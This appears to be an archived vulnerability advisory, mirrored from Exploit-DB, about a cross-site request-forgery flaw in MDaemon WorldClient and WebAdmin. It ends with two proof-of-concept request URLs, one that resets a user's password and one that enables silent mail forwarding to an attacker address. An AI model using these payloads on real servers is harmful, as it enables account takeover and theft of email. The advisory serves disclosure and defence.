MDaemon WorldClient and WebAdmin Cross-Site Request-Forgery Vulnerability

vendor:

MDaemon WorldClient and WebAdmin

by:

SecurityFocus

7,5

CVSS

HIGH

Cross-Site Request-Forgery

352

CWE

Product Name: MDaemon WorldClient and WebAdmin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

MDaemon WorldClient and WebAdmin Cross-Site Request-Forgery Vulnerability

MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Mitigation:

Implementing a secure authentication mechanism and validating all input data can help mitigate this issue.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58076/info

MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. 

http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com